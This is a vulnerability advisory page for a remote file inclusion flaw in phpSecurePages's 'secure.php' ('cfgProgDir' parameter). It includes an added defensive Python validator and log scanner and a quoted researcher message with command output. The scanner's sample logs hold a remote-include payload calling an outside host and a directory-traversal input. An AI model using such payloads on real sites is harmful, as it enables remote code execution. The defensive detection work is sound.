


Category:   Application (Security)  >   phpSecurePages
Vendors:   Kruyt, Paul
phpSecurePages Include File Bug in 'secure.php' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014410
SecurityTracker URL:
CVE Reference:   CVE-2005-2251   (Links to External Site)
Updated:  Jun 16 2008
Original Entry Date:  Jul 7 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.28 beta
Description:   Status-x reported an include file vulnerability in phpSecurePages. A remote user can execute arbitrary commands on the target system.

The 'secure.php' script does not properly validate user-supplied input in the 'cfgProgDir' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.
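The defect described above is a classic remote file inclusion: the script builds an include path from a request-controlled parameter (here 'cfgProgDir') and PHP then loads code from wherever that path points, a remote URL included. The following Python is an added defensive example, not code from the SecurityTracker entry or from phpSecurePages itself. It shows the validation a hardened script should apply to such a value (assuming only subdirectories of a fixed application root are ever legitimate; the root path used is an assumption) and a detection pass that flags requests in web-server access logs where the parameter carries a URL scheme or a directory-traversal sequence. The log lines are constructed samples.

```python
"""
Added example (not part of the advisory or of phpSecurePages):
  1. validate_include_dir(): allowlist-style check for an include-path
     parameter such as 'cfgProgDir'. Assumption: legitimate values are
     relative subdirectories of APP_ROOT and nothing else.
  2. find_rfi_attempts(): scan Apache/nginx combined-format access-log
     lines and report requests whose 'cfgProgDir' value fails that check.
"""
import posixpath
import re
from typing import Dict, Iterable, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed install location; adjust to the real document root.
APP_ROOT = "/var/www/phpSecurePages"

# The page names 'cfgProgDir' (secure.php) as the unsafe parameter.
WATCHED_PARAMS = {"cfgProgDir"}

# Any leading URL scheme (http:, ftp:, php:, data:, ...) means the value
# would make PHP's include() fetch code from a stream, not a local dir.
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*:", re.IGNORECASE)

# Combined log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)


def validate_include_dir(value: str, app_root: str = APP_ROOT) -> Optional[str]:
    """Return the normalised absolute directory under app_root, or None
    if the value must be rejected (URL scheme, absolute path, NUL byte,
    backslash, or any '..' component)."""
    if not value or "\x00" in value or "\\" in value:
        return None
    if SCHEME_RE.match(value):
        return None
    if value.startswith("/"):
        return None
    parts = [p for p in value.split("/") if p not in ("", ".")]
    if any(p == ".." for p in parts):
        return None
    return posixpath.join(app_root, *parts) if parts else app_root


def find_rfi_attempts(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one record per log line whose watched parameter fails
    validate_include_dir(). Values are decoded a second time so that
    double-URL-encoded payloads (%252e%252e) are also caught."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line; skip
        query = urlsplit(m.group("target")).query
        params = parse_qs(query, keep_blank_values=True)
        for name in WATCHED_PARAMS:
            for raw in params.get(name, []):
                val = unquote(raw)
                if validate_include_dir(val) is None:
                    hits.append({
                        "ip": m.group("ip"),
                        "time": m.group("ts"),
                        "param": name,
                        "value": val,
                        "status": m.group("status"),
                    })
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Jul/2005:10:00:00 +0000] '
    '"GET /phpSecurePages/secure.php?cfgProgDir=http://192.0.2.10/x.txt? HTTP/1.0" 200 512',
    '198.51.100.7 - - [07/Jul/2005:10:00:05 +0000] '
    '"GET /phpSecurePages/secure.php?cfgProgDir=../../../../etc/ HTTP/1.0" 200 128',
    '192.0.2.44 - - [07/Jul/2005:10:01:00 +0000] '
    '"GET /phpSecurePages/checklogin.php?user=bob HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['param']}={hit['value']!r} "
              f"-> HTTP {hit['status']}")
```

The validator is the fallback, not the fix: an include path should never be read from the request at all. It belongs in a configuration file, and the server-side `register_globals` behaviour that lets a query-string parameter overwrite a script's `$cfgProgDir` variable should be disabled, with `allow_url_include` (and, where possible, `allow_url_fopen`) turned off so that a stray include can at most read a local file rather than fetch code over the network.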

A demonstration exploit URL is provided:


[Editor's note: frog-m@n reported a vulnerability in the 'checklogin.php' script in October 2002, affecting version 0.27b. Status-x reports that the latest version (0.28 beta) is also vulnerable. See Alert ID 1005370.]

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  phpSecurePages Remote File Include

Affected software: phpSecurePages X.X

Risk: High

Vendor contacted at but didn't reply

phpSecurePages is a secure protection for restricted directories and
it won't let anybody get into your site! <---- lie


We found bad filtering in the secure.php and checklogin.php code in
the phpSecurePages directory

Successful exploitation requires that secure.php or checklogin.php are
loaded correctly by the system



uid=32169(ooddles) gid=32170(ooddles)

So be careful to use this ;)


No original advisory available

by Status-x
